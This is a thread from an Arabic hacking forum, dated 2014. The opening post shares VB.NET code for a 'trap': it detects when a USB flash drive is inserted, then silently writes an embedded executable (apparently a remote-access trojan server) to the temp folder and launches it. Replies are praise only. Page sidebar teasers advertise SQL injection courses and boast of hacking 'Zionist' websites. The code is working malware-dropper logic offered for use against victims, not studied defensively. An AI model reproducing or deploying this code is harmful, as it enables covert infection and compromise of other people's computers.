1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع
  4. 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول
    الكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه
    لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده قرائة الموضوع

[ تلغيم ] تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

الموضوع في 'حماية الأجهزة' بواسطة KaDiM aL-iRaQi, بتاريخ ‏9 نوفمبر 2014.

كاتب الموضوع : KaDiM aL-iRaQi المشاهدات : 604 الردود : 15 ‏9 نوفمبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    KaDiM aL-iRaQi ExpertDeveloper
    ExpErt DeveloPer

    عضو منذ:
    ‏2 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:

    [​IMG]
    [​IMG]

    بسسم الله الرحمن الرحيم~..


    كيف الحال محبين وعشأق التلغيم~..


    بعد غيآب أيأم قليله نعود آليكم ~..


    بـتلغيمه شرطية ~..


    وهي عند أدخآأل آلفلاش يتم تشغيل السيرفر ~..


    آنشآء آلله تعجبكم ألتلغيمهَ نـتـركـكـم لمشآهده الفديوَ ~..

    [​IMG]
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    [​IMG]

    آلكود آلموجود في آلشرح . ."


    Private Const WM_DEVICECHANGE As Integer = &H219
    Private Const DBT_DEVICEARRIVAL As Integer = &H8000
    Private Const DBT_DEVICEREMOVECOMPLETE As Integer = &H8004


    Protected Overrides Sub WndProc(ByRef m As System.Windows.Forms.Message)
    If m.Msg = WM_DEVICECHANGE Then
    If m.WParam.ToInt32 = DBT_DEVICEARRIVAL Then
    MsgBox("ادخال الفلاش")

    Dim kadim = IO.Path.GetTempPath & "\" & "kadim.exe"
    IO.File.WriteAllBytes(kadim, My.Resources.IRAQ2)
    Process.Start(kadim)

    ElseIf m.WParam.ToInt32 = DBT_DEVICEREMOVECOMPLETE Then
    MsgBox("اخراج الفلاش")
    End If
    End If
    MyBase.WndProc(m)
    End Sub​


    [​IMG]

    فــي آمــآن آلــلــه
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    T3BaN_HaCkEr
    rankrank
    Developer

    عضو منذ:
    ‏11 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    بارك الله فيك

    وجزاك الله خيرا


    شرح جميل ومفيد
     


  3. غير متصل

    فيصــــــــل
    rank
    Developer

    عضو منذ:
    ‏3 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    تســلم ايديك يالغالي جاري المشاهده
     


  4. غير متصل

    wesker Hacker
    rank
    Developer

    عضو منذ:
    ‏12 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    السلام عليكم ورحمة الله وبركاته
    موضوع رائع منك سلمت اناملك
    بارك الله فيك
    واصل من الافضل للأفضل
     


  5. غير متصل

    ~iRaQi-Hacker~
    rank
    Developer

    عضو منذ:
    ‏7 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    مششكوٍر قلبي ، آبدآع متوآصل ، تألق دآئم ، = {1$0}[​IMG]{1$0}
     


  6. غير متصل

    Oth Màn
    rank
    Developer

    عضو منذ:
    ‏9 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    رااائع استمر حبيبي
     


  7. غير متصل

    Zero-737
    Developer

    عضو منذ:
    ‏15 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    شكراً لك أخي وماقصرت :{1!}:
     


  8. غير متصل

    General Rahmane Developer plus
    DeveloPer Plus

    عضو منذ:
    ‏31 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    سلمت يداك ياغالي

    شرح جميل جداً

    :{11}: :{11}:
     


  9. غير متصل

    مسلم السيلاوي
    DeveloPer Plus

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    احسنت وبارك الله فيك حبي
     


  10. غير متصل

    Mr3amo
    rank
    Developer

    عضو منذ:
    ‏20 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    بارك الله فيك
    :{12}::{12}::{12}::{12}:
    وجزاك الله خيرا
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...